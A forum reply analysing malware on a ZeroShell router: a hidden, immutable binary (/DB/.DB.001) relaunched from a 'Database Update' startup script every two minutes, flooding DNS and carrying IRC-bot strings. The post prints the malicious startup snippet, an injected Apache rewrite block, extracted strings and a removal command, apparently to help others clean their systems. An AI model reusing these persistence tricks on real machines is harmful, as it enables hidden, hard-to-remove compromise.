Reply To: DoS on DNS Zeroshell: Malware!

Home Page Forums Network Management ZeroShell DoS on DNS Zeroshell: Malware! Reply To: DoS on DNS Zeroshell: Malware!

#52997

fsala
Member

In short:

Issue is in a running hidden executable (/DB/.DB.001) that opens thousands of connections to the DNS :!:.
File attributes are made to hide it and make deletion harder.


root@zeroshell DB> ls -al
total 131252
drwxr-xr-x 4 root root 4096 Oct 21 17:09 .
drwxr-xr-x 21 root root 520 Nov 6 12:55 ..
-rwxr-xr-x 1 root root 23289 Nov 21 2012 .DB.001
drwxr-xr-x 7 root root 4096 Jul 2 2012 _DB.001
drwx
2 root root 16384 Apr 20 2011 lost+found
-rw-r--r-- 1 root root 134217728 Apr 20 2011 swap-file

root@zeroshell DB> lsattr .DB.001
-u--ia
.DB.001

To deactivate/rename it:


killall -9 .DB.001 ; chattr -iua .DB.001 ; mv .DB.001 DB-malware

I analyzed the activity with “strace”: there are thousands of connections to DNS with query for “zeroshell.will.mx” and “zeroshell.samhan.biz” and the binary contains code to activate IRC connection (like a lot of worms).

Executable starts at boot, inside “Database Update” script (you find it in the Startup/Cron area) and is scheduled to restart every 2 minutes.


# SSL Security Check
Security=$(cat /etc/httpd/ssl.conf | grep C100-Security-Fix-beta12)
if [ -z "$Security" ] && [ -f "/Database/var/register/system/ssl/ssl.conf" ]; then
cp -rf /Database/var/register/system/ssl/ssl.conf /etc/httpd/ssl.conf
httpd=$(pidof httpd);kill -HUP $httpd
fi

# Database Update
Database=$(pidof .DB.001)
if [ -z "$Database" ]; then
/DB/.DB.001
fi
echo "OK"

It changes also SSL configuration of Apache:


# C100-Security-Fix-beta12

SSLOptions +StdEnvVars
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(..//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]
RewriteRule .* - [F]

The binary payload contains this kind of strings (IRC connection, browser emulation…), so I’m sure it’s a malware:


zeroshell.will.mx
zeroshell.samhan.biz
r/usr/dict/words%s : USERID : UNIX : %s
http://GET /%s HTTP/1.0
User-Agent: Mozilla/4.75 (X11; U; Linux 2.2.16-3 i686)
NICK %s
HELPIRC SH export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%sNOTICE %s :%s
MODE %s -xi
JOIN %s :%s
WHO %s
PONG %s
352376433422PRIVMSGPINGNICKmkdir /tmp/lol/lib/kw+#z1zNICK %s
USER %s localhost localhost

At the moment, I don’t know what was the infection entry point, but I suspect a bug in the openSSL library or in that area…

Hope it helps!

Fabrizio Sala/Netdream